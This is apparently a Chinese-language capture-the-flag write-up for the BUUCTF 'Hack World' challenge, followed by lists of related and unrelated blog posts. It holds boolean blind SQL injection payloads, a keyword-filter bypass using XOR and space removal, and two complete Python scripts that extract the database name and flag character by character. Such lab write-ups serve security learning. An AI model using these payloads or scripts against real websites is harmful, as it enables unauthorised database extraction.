id=0

id=1

id=2

id=3





发现结果不一样,尝试 : ">4","=4","<4" : 




在自己的环境下验证一下:




爆一下数据库:




id=(ascii(substr(database(),1,1))>32)








'''

@Modify Time      @Author

------------      -------

2019/10/25 19:28   laoalo

'''

import requests

from lxml import etree

def a():

    url="http://6a93b089-ace7-4ece-8334-b10dd79ac360.node3.buuoj.cn/"

    flag="Hello, glzjin wants a girlfriend."

    final=""

    stop=0

    for i in range(1,129):

         print("*"*50,i,"*"*50)

         stop=0

         for j in range(32,129):

             stop = j

             data={"id":"(ascii(substr(database(),%d,1))=%d)" %(i,j)}

             # data={"id":"(ascii(substr((select flag from flag),%d,1))=%d)" %(i,j)}

             re = requests.post(url=url,data=data).text.replace('\n','')

             html = etree.HTML(re).xpath("//text()")

             print(">>",html)

             if flag in html:

                  final+=chr(j)

                  print("\n\t\t\t\t",final)

                  break

         if stop >= 128:

            print("*"*50,"结束")

            print(">>",final)

            break

if __name__ == '__main__':

       a()








过滤如何处理:


在爆flag的时候发现有过滤 :select,show,""……很是难受,后来在师傅的博客上看到了这种方法:




id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))






1^1=0 ,0^0=0 ,0^1=1


1^1^1=1, 1^1^0=0
构造payload:1^ascii(mid(database(),1,1)=98)^0


注意这里会多加一个^0或1是因为在盲注的时候可能出现了语法错误也无法判断,而改变这里的0或1,如果返回的结果是不同的,那就可以证明语法是没有问题的


其实不用抑或也行:




id=(ascii(substr((select(flag)from(flag)),1,1))<128)






居然去掉空格就成功绕过了Orz,这个方法要学习一下,这里贴一下我的脚本,没有用二分十分简单的枚举:




'''

@Modify Time      @Author

------------      -------

2019/10/25 19:28   laoalo

'''

import requests

from lxml import etree

def a():

    url="http://6a93b089-ace7-4ece-8334-b10dd79ac360.node3.buuoj.cn/"

    flag="Hello, glzjin wants a girlfriend."

    final=""

    stop=0

    for i in range(1,1290):

         print("*"*50,i,"*"*50)

         stop=0

         for j in range(32,129):

             stop = j

             data={"id":"1^(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))" %(i,j)}

             re = requests.post(url=url,data=data).text.replace('\n','')

             html = etree.HTML(re).xpath("//text()")

             # print(">>",html)

             if flag in html:

                  final+=chr(j)

                  print("\n\t\t\t\t",final)

                  break

         if stop >= 128:

            print("*"*50,"结束")

            print(">>",final)

            break

if __name__ == '__main__':

       a()








参考资料:


SQL注入学习总结(八):其他SQL注入的异或注入:https://blog.csdn.net/weixin_30740295/article/details/96833688




buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World:https://blog.csdn.net/weixin_43345082/article/details/99062970


												


											
BUUCTF | [CISCN2019 华北赛区 Day2 Web1]Hack World的更多相关文章
	

    
								
  1. 刷题记录:[CISCN2019 华北赛区 Day2 Web1]Hack World
		
    目录 刷题记录:[CISCN2019 华北赛区 Day2 Web1]Hack World 一.前言 二.正文 1.解题过程 2.解题方法 刷题记录:[CISCN2019 华北赛区 Day2 Web1] ...
    
		
    2. 
						
  2. [CISCN2019 华北赛区 Day2 Web1]Hack World
		
    知识点:题目已经告知列名和表明为flag,接下来利用ascii和substr函数即可进行bool盲注 eg: id=(ascii(substr((select(flag)from(flag)),1,1 ...
    
		
    3. 
						
  3. BUUOJ [CISCN2019 华北赛区 Day2 Web1]Hack World
		
    补一下这道题,顺便发篇博客 不知道今年国赛是什么时候,菜鸡还是来刷刷题好了 0X01 考点 SQL注入.盲注.数字型 0X02自己尝试 尝试输入1 赵师傅需要女朋友吗???随便都能有好吧 输入2 ?? ...
    
		
    4. 
						
  4. 刷题[CISCN2019 华北赛区 Day2 Web1]Hack World
		
    解题思路 打开发现是很简单的页面,告诉了表名和列名,只需知道字段即可 尝试一下,输入1,2都有内容,后面无内容.输入1'让他报错,发现返回bool(false) 大概思路就是布尔型注入了,通过不断返回 ...
    
		
    5. 
						
  5. [CISCN2019 华北赛区 Day2 Web1]Hack World 1详解
		
    打开题目, 我们开始尝试注入, 输入0回显Error Occured When Fetch Result. 输入1回显Hello, glzjin wants a girlfriend. 输入2回显Do ...
    
		
    6. 
						
  6. [CISCN2019 华北赛区 Day2 Web1]Hack World(二分法写布尔注入脚本)
		
    记一道布尔注入的题,存在过滤字符. 从题目看应该是一道注入题.提示存在flag表flag列. 输入1和2的返回结果不一样,可能是布尔注入. 简单用万能密码尝试了一下.提示SQL Injection C ...
    
		
    7. 
						
  7. BUUCTF | [CISCN2019 华北赛区 Day1 Web1]Dropbox
		
    步骤: 1.运行这个: <?php class User { public $db; } class File { public $filename; } class FileList { pr ...
    
		
    8. 
						
  8. 刷题记录:[CISCN2019 华北赛区 Day1 Web1]Dropbox
		
    目录 刷题记录:[CISCN2019 华北赛区 Day1 Web1]Dropbox 一.涉及知识点 1.任意文件下载 2.PHAR反序列化RCE 二.解题方法 刷题记录:[CISCN2019 华北赛区 ...
    
		
    9. 
						
  9. PHAR伪协议&&[CISCN2019 华北赛区 Day1 Web1]Dropbox
		
    PHAR:// PHP文件操作允许使用各种URL协议去访问文件路径:如data://,php://,等等 include('php://filter/read=convert.base64-encod ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. VUEJS(vuejs) 数组数据不及时刷新
			
    在Vue对象中的methods属性中构建一个方法用于刷新data使用Vue.set方法进行手动刷新methods:{update:function(o){Vue.set(this,'list',o); ...
    
			
    2. 
						
  2. 转载    IDEA搭建maven项目详细步骤(解决没有src及其下面的文件)
			
    转载自
    
			
    3. 
						
  3. get_date.sh
			
    #!/usr/bin#####################################################################日期函数处理#获取某个月份的天数 getM ...
    
			
    4. 
						
  4. HashMap -双列集合的遍历与常用的方法
			
    package cn.learn.Map; /* java.util.Hashtable<k,y> implements Map<k,v> 早期双列集合,jdk1.0开始 同步 ...
    
			
    5. 
						
  5. 设置div标签可以输入文字
			
    1.contenteditable 属性可以设置div标签为克输入标签,   2.input和textarea虽然是常用的输入标签,但是这两个标签不能设置最大高度和最小高度, 随意如果想随着输入的内容 ...
    
			
    6. 
						
  6. linux配置mysql数据库远程连接失败
			
    今天配置linux下mysql数据库可以远程访问的问题,百度这方面的资料有很多,但是方法都一样,都试过了却未能解决,记录一下 第一步:在/etc/mysql/my.cnf下找到bind-address ...
    
			
    7. 
						
  7. hdu3664 Permutation Counting(dp)
			
    hdu3664 Permutation Counting 题目传送门 题意: 在一个序列中,如果有k个数满足a[i]>i:那么这个序列的E值为k,问你 在n的全排列中,有多少个排列是恰好是E值为 ...
    
			
    8. 
						
  8. python print (x,end = '') 意思作用
			
    for x in range(10) python print(x)换行输出 for x in range(10) python print (x,end = '')  不换行输出
    
			
    9. 
						
  9. thinkphp开发微信小程序后台流程
			
    thinkphp开发微信小程序后台流程,简单分享一下微信开发流程 1,注册微信小程序账号 2,注册好后,登陆微信小程序,下载微信小程序开发工具 3,用thinkphp开发企业后台,前台数据用json返 ...
    
			
    10. 
						
  10. asp.net  连续打印多份HTML页面,出现漏字
			
    在IE8上打印的内容用了CSS 样式,连续打印多份导致的 可以通过改变CSS样式或更换浏览器解决
    
			
    11.